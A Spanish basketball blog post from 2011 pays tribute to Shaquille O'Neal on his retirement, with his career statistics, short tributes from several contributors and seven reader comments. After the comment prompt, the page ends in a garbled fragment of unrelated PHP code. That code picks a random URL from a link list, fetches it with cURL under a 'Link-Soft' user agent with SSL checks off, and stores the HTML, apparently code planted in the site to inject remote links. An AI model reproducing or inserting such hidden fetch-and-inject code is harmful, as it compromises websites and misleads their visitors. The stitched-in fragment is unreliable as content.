Tributo al gran Shaquille O’Neal

02 de June de 2011 por txusma

Hoy nos despertamos con la noticia de la retirada de uno de los grandes. Shaquille O’Neal abandona la NBA a los 39 años después de 19 temporadas en activo en las que ha cosechado innumerables éxitos y récords.

Ha ganado 4 anillos (2000, 2001, 2002, 2006), ha disputado 15 partidos del All Stars, ha sido MVP de la liga regular una vez y MVP de las finales y del All-Stars en 3 ocasiones. La temporada 1999/2000 (la mejor de su carrera) promedió 29’7 puntos, 13’6 rebotes  y 3 tapones por partido y lo ganó todo (anillo, MVP de la regular, MVP de la final, MVP del All-Stars). Solo Willis Reed y Michael Jordan hicieron lo mismo en alguna otra temporada. Shaquille se retira como el quinto mejor anotador de todos los tiempos y como el jugador con más temporadas promediando más de 20 puntos y 10 rebotes (13) por encima de monstruos como Jabbar, Chamberlain o Olajuwon. Para nosotros, el quinto mejor pívot de la historia y el tercer mejor jugador de la pasada década.

Valga como pequeño homenaje las líneas que algunos colaboradores y comentaristas del blog hemos escrito al conocer la noticia. Seguro que muchos más aportaréis vuestras reflexiones en los comentarios.

Sin tener el juego de pies de Olajuwon o la capacidad de sacarse un tiro de la manga como el “Sky Hook” de Jabbar o la tenacidad defensiva de Russell, Shaq ha sido capaz de situar sus “kilos” de talento y fuerza natural en medio de la pintura de los más grandes. Siempre polémico por su exagerada forma de ser, tanto dentro como fuera de la cancha, Shaq estará, sin duda, dentro de nuestros mejores recuerdos de este bendito deporte. Telekoman

Allá por el año 94 había 3 fuerzas de la naturaleza que a un servidor le parecían semidioses: El All-Black Jonah Lomu, el indescriptible Mike Tyson, y Shaquille O’Neal. Simplemente sobresalían del resto.

Mi recuerdo de Shaq es el del jugador más dominante que he visto. Sé que Jordan, Magic, Chamberlain… estaban por encima de él, pero aún me siento impresionado por aquel ciclón al que Dunleavy unos años después sólo se le ocurría pararle con el ya famoso “Hack-a-Shaq”. Brian Grant, Arvydas Sabonis, Dale Davis, un lechoncillo como Jermaine… le veían arrasar impotentes partido tras partido.  Aquellas series me marcaron más que ninguna otra.

Shaq se va, y con él una parte de la historia de la NBA. Yo personalmente le echaré mucho de menos. Su mentalidad infantil en ese cuerpo, sus 216 centímetros y 150 kilos lanzándose a correr el contraataque, su asombrosa agilidad…, y sí, su muñeca de madera… Todo ello le hacían entrañable a mis ojos. Hasta siempre Shaq… Hynreck15

Se retira toda una institución de la liga. Aunque no fuera todo lo profesional que nos hubiera gustado sí que fue un ejemplo de deportividad ya a pesar de ser posiblemente del jugador que más faltas y golpes de todo tipo ha sufrido, poquísimas veces le vimos encararse con alguien. De hecho, sólo Charles Barkley consiguió sacarle de sus casillas,algo más que comprensible tratándose del Gordo. Su forma de ser nos ha dejado momentos para el recuerdo de todo tipo. Fue durante muchos años la gran atracción de los All-Stars con sus apariciones como playmaker, sus peculiares tiros libres, o sus actuaciones besando a rivales o dejando en evidencia a los mas jóvenes con un baile espectacular.

Deportivamente no debemos permitir que sus últimos años ensucien nuestro recuerdo. Ni los anillos, ni los premios ni las estadísticas que indican su palmarés permitirán a futuras generaciones sentir lo que fue Shaq durante varios años en la liga: una sensación de dominio, casi de devastación que hizo a muchos buenos jugadores parecer peleles y a equipos de época ver la gloria desde lejos.

A un tio tan molón como él siempre se le echa de menos. Viva_Dirk

El artículo 34: “Hago lo que quiero, cuando quiero y como me da la gana”. TheDeerHunter

Hoy me he levantado con la noticia en twitter del adiós de un grande, para mí el mejor pivot que he podido ver jugar a este maravilloso deporte. Se va Shaquille O´Neal tras 19 años de deleitarnos con sus movimientos sobre el parquet de las canchas de baloncesto de la mejor liga del mundo. Deja tras de sí 4 titulos de campeón, 3 MVP de las finales, un MVP de la temporada regular y un largo sinfin de premios. Pero para mí deja algo más, deja esa personalidad suya tan característica, divertida y poco común en el deporte profesional en USA. Esa personalidad que le ha hecho disfrutar de este deporte tantos años. Esa personalidad que quizás le haya privado de ser el mejor pívot de la historia. Cocinitas

Cuando he oído por la radio la noticia de la retirada de Shaquille esta mañana reconozco que no he podido evitar soltar una exclamación. Para mi, fan declarado de los Bulls y enamorado de Jordan, ha supuesto un golpe mayor que cuando se retiro mi gran ídolo. En parte, tal vez porque Jordan se retiró hasta en 3 ocasiones, pero sobretodo porque a Shaquille le conozco desde el primer día que entró a formar parte de la NBA en aquel lejano 1992. Desde aquel año, NBA y O’Neal han sido dos conceptos íntimamente relacionados en mi cerebro hasta el punto de creer que no se puede entender uno sin el otro. A partir de hoy creo que tendré que acostumbrarme. Ya tiemblo pensando en el día en que se retiren Tim Duncan, Kevin Garnett o Kobe Bryant… Txusma

Comenta

7 comentarios a esta entrada

  1. Scriers dice:
    #1

    Para mí, uno de los jugadores que más y mejor simbolizaban la “nueva NBA”. Igual fuerza de la naturaleza que showman, a la hora de jugar no había más show que meter la pelotita en el aro. En eso Shaq ha sido una bestia que ha sabido utilizar su mastodóntico físico. Hay muchas fuerzas de la naturaleza cuya inteligencia a la hora de entender el juego no les da para ser eternos. Shaq lo será, aunque siempre quedará la sensación de que pudo subir algún peldaño más aún. Aún así, entre los mejores pivots de la historia.

      Citar

  2. Vader dice:
    #2

    Si tuviera que elegir un pivot para mi equipo ideal de todos los tiempos ese seria Shaq. Creo que con eso ya doy mi opinion sobre el montruo que se retira.

    Saludos

      Citar

  3. Denise dice:
    #3

    Un crack tanto dentro como fuera de la cancha. El mejor pivot que he visto…y posiblemente que veré, dificil que salga otro igual que él.

      Citar

  4. KB # 24 dice:
    #4

    No sé quién dijo ésta frase pero la encuentro muy cierta, “Parecía un hombre jugando contra niños”

    Hasta pronto Shaq

      Citar

  5. arvydas dice:
    #5

      Citar

  6. Gallis dice:
    #6

    Llego tarde, pero aquí van unas palabras para el perro grande:

    Cuando pienso en Shaq me vienen a la cabeza canastas, mates, celebraciones y noche en vela, salpicadas por miles de comentarios de Andrés Montes sobre él, pero sobre todo, como apunta Deer, el artículo 34…y es que creo que ese comentario es incluso más acertado de lo que el propio Montes imaginó. Shaq siempre hizo lo que quiso, cuando quiso y como le dió la gana, dentro y fuera de la cancha. Hay jugadores para los que el baloncesto es una obsesión y ganar una necesidad, pero Shaq nunca fue uno de ellos. Para Shaq el baloncesto solo fue una parte más de su vida con la que disfrutar y, sobre todo, hacernos disfrutar a todos. Pudo ser el mejor, pero se “conformó” con ser uno de los mejores. Ganó 4 anillos, dominó la liga, formó junto a Kobe la pareja más letal (y polémica) del comienzo del Siglo XXI…y además de todo eso, se divirtió como pocos lo habrán hecho en su vida…

    Se va el bíceps más famoso de la liga y a fe que le vamos a echar de menos…

      Citar

  7. Blade Petrovic dice:
    #7

    El mejor center de los ultimos años un verdadero jugonsi me dices shaq me viene a la cabeza un monton de mates,de tapones.Cuantos partidos de Nba live 10 he ganado con ally-hoopos a shaq y esa famosa frase:solo mito los tiros libres importantes solo esos.HOF seguro.Y uno de los 10 mejores jugadsores de toda la historia

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>